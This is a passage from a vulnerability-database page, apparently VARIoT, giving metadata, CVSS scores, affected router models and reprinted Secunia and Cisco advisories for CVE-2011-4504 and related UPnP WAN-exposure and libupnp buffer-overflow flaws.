"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Garcia",
"sources": [
{
"db": "BID",
"id": "50810"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4504",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CARNEGIE MELLON",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.4,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "NONE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.0,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "VU#357851",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2011-4504",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-52449",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4504",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#357851",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201111-366",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-52449",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "VULHUB",
"id": "VHN-52449"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"db": "NVD",
"id": "CVE-2011-4504"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UPnP IGD implementation in the Pseudo ICS UPnP software on the ZyXEL P-330W allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to the internal host or proxy connection of the NAT firewall. Remote unauthenticated attackers can exploit vulnerabilities to scan internal hosts or communicate via the device proxy Internet. \nThe following devices are affected:\nCisco Linksys WRT54G firmware version prior to 4.30.5\nCisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1\nCisco Linksys WRT54GS v4 firmware versions prior to 1.06.1\nCisco Linksys WRT54GX firmware 2.00.05\nEdimax BR-6104K prior to 3.25\nEdimax 6114Wg\nCanyon-Tech CN-WF512 firmware version 1.83\nCanyon-Tech CN-WF514 firmware version 2.08\nSitecom WL-153 prior to firmware 1.39\nSitecom WL-111\nSweex LB000021 firmware version 3.15\nZyXEL P-330W\nSpeedTouch 5x6 firmware versions prior to 6.2.29\nThomson TG585 firmware versions prior to 7.4.3.2. ZyXEL P-330W is a wireless broadband router. A vulnerability exists in the UPnP IGD installation enablement of the ZyXEL P-330W\u0027s Pseudo ICS UPnP software. This vulnerability is related to the \\\"external forwarding\\\" vulnerability. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSiemens OZW / OZS Multiple Products libupnp Buffer Overflow\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA52035\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/52035/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nRELEASE DATE:\n2013-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/52035/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/52035/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in multiple Siemens OZW\nand OZS products, which can be exploited by malicious people to\ncompromise a vulnerable device. \n\n1) Multiple vulnerabilities are caused due to a bundled version of\nlibupnp. \n\nFor more information:\nSA51949\n\n2) Multiple boundary errors within the \"unique_service_name()\"\nfunction (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests\ncan be exploited to cause stack-based buffer overflows. The vendor is planning\nto provide fixes with upcoming firmware updates. \n\nPROVIDED AND/OR DISCOVERED BY:\n2) Rapid7\n\nORIGINAL ADVISORY:\nSiemens SSA-963338:\nhttp://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf\n\nRapid7:\nhttps://community.rapid7.com/docs/DOC-2150\nhttps://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. This library is used in several vendor network\ndevices in addition to media streaming and file sharing applications. \nThese vulnerabilities were disclosed on January 29th, 2013 in a CERT\nVulnerability Note, VU#922681, which can be viewed at:\n\nhttp://www.kb.cert.org/vuls/id/922681\n\nCisco is currently evaluating products for possible exposure to these\nvulnerabilities. This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+\nga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5\n=6sTu\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4504"
},
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "VULHUB",
"id": "VHN-52449"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
}
],
"trust": 4.86
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851",
"trust": 5.8
},
{
"db": "NVD",
"id": "CVE-2011-4504",
"trust": 3.4
},
{
"db": "SIEMENS",
"id": "SSA-963338",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#922681",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201111-366",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2011-5060",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "18224",
"trust": 0.6
},
{
"db": "BID",
"id": "50810",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "52035",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-52449",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119949",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119896",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"db": "VULHUB",
"id": "VHN-52449"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4504"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
]
},
"id": "VAR-201111-0160",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"db": "VULHUB",
"id": "VHN-52449"
}
],
"trust": 1.4788191
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5060"
}
]
},
"last_update_date": "2023-12-18T12:09:30.333000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.zyxel.com/"
},
{
"title": "Patch for Multiple Routers UPnP WAN Interface Remote Unauthorized Access Vulnerability (CNVD-2011-5060)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/6020"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-16",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-52449"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"db": "NVD",
"id": "CVE-2011-4504"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.4,
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"trust": 1.7,
"url": "http://www.upnp-hacks.org/suspect.html"
},
{
"trust": 1.6,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?vw=1\u0026articleid=28341"
},
{
"trust": 1.1,
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/docs/doc-2150"
},
{
"trust": 0.9,
"url": "http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf"
},
{
"trust": 0.8,
"url": "http://toor.do/upnp.html"
},
{
"trust": 0.8,
"url": "http://www.h-online.com/security/news/item/upnp-enabled-routers-allow-attacks-on-lans-1329727.html"
},
{
"trust": 0.8,
"url": "http://toor.do/defcon-19-garcia-upnp-mapping-wp.pdf"
},
{
"trust": 0.8,
"url": "http://pupnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf"
},
{
"trust": 0.8,
"url": "http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp"
},
{
"trust": 0.8,
"url": "http://opentools.homeip.net/dev-tools-for-upnp"
},
{
"trust": 0.8,
"url": "http://upnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "http://www.dlink.com/us/en/technology/upnp"
},
{
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv13-003.html"
},
{
"trust": 0.8,
"url": "http://www.ipitomy.com/index.php/mi-security-notice-ip001"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4504"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu357851/"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4504"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu357851"
},
{
"trust": 0.6,
"url": "http://www.kb.cert.org/vuls/id/357851http"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/18224"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20130129-upnp"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/922681"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"db": "VULHUB",
"id": "VHN-52449"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4504"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"db": "VULHUB",
"id": "VHN-52449"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4504"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2013-01-29T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"date": "2011-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-52449"
},
{
"date": "2011-11-24T00:00:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2013-01-31T07:26:31",
"db": "PACKETSTORM",
"id": "119949"
},
{
"date": "2013-01-30T02:46:44",
"db": "PACKETSTORM",
"id": "119896"
},
{
"date": "2011-11-22T11:55:06.013000",
"db": "NVD",
"id": "CVE-2011-4504"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-30T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2014-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"date": "2012-03-08T00:00:00",
"db": "VULHUB",
"id": "VHN-52449"
},
{
"date": "2015-03-19T08:33:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2012-03-08T05:00:00",
"db": "NVD",
"id": "CVE-2011-4504"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPnP requests accepted over router WAN interfaces",
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
],
"trust": 0.6
}
}
VAR-201111-0162
Vulnerability from variot - Updated: 2023-12-18 12:09The UPnP IGD implementation on the Thomson (aka Technicolor) TG585 with firmware 7.x before 7.4.3.2 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. UPnP For supported routers, WAN Unintended from the side interface UPnP There is a vulnerability that allows the request to be accepted.An unauthenticated remote third party could obtain local network information or use the product as a proxy. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to the internal host or proxy connection of the NAT firewall. Remote unauthenticated attackers can exploit vulnerabilities to scan internal hosts or communicate via the device proxy Internet. The following devices are affected: Cisco Linksys WRT54G firmware version prior to 4.30.5 Cisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1 Cisco Linksys WRT54GS v4 firmware versions prior to 1.06.1 Cisco Linksys WRT54GX firmware 2.00.05 Edimax BR-6104K prior to 3.25 Edimax 6114Wg Canyon-Tech CN-WF512 firmware version 1.83 Canyon-Tech CN-WF514 firmware version 2.08 Sitecom WL-153 prior to firmware 1.39 Sitecom WL-111 Sweex LB000021 firmware version 3.15 ZyXEL P-330W SpeedTouch 5x6 firmware versions prior to 6.2.29 Thomson TG585 firmware versions prior to 7.4.3.2. A vulnerability exists in the UPnP IGD installation enablement in Thomson (also known as Technicolor) TG585 with firmware 7.x prior to firmware 7.4.3.2. This vulnerability is related to the \"external forwarding\" vulnerability. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: Siemens OZW / OZS Multiple Products libupnp Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA52035
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52035/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
RELEASE DATE: 2013-01-31
DISCUSS ADVISORY: http://secunia.com/advisories/52035/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/52035/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Multiple vulnerabilities have been reported in multiple Siemens OZW and OZS products, which can be exploited by malicious people to compromise a vulnerable device.
1) Multiple vulnerabilities are caused due to a bundled version of libupnp.
For more information: SA51949
2) Multiple boundary errors within the "unique_service_name()" function (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests can be exploited to cause stack-based buffer overflows. The vendor is planning to provide fixes with upcoming firmware updates.
PROVIDED AND/OR DISCOVERED BY: 2) Rapid7
ORIGINAL ADVISORY: Siemens SSA-963338: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf
Rapid7: https://community.rapid7.com/docs/DOC-2150 https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. This library is used in several vendor network devices in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at:
http://www.kb.cert.org/vuls/id/922681
Cisco is currently evaluating products for possible exposure to these vulnerabilities. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+ ga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5 =6sTu -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201111-0162",
"affected_products": {
"@context": {
